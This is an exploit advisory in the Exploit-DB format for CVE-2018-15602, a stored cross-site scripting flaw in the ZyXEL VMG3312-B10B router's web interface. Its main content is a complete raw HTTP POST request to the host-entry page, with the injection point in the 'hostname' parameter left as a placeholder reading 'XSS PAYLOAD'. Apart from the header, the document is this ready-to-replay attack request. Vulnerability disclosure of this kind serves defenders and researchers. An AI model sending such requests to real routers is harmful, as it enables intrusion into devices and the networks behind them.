ZyXEL VMG3312-B10B Stored Cross-Site Scripting

August 21, 2018

Exploit Author : Samet SAHIN
Date : 21.08.2018
Software Link : ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
Vendor Homepage : https://www.zyxel.com/
Version : ZyXEL VMG3312-B10B
Tested on : Mozilla Firefox 61.0.2 && Google Chrome 67.0.3396.99
Category : Stored XSS
CVE ID : CVE-2018-15602



POST REQUEST :

POST /pages/connectionStatus/connectionStatus-hostEntry.cmd HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/index.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie: SESSION=529313605
Connection: close
Upgrade-Insecure-Requests: 1
action=edit&oldip=192.168.1.36&hosttype=&sessionKey=1997367832&hostname=XSS PAYLOAD

Vulnerable Page : /pages/connectionStatus/connectionStatus-hostEntry.cmd
Vulnerable Parameter : hostname

Exploit DB : 45236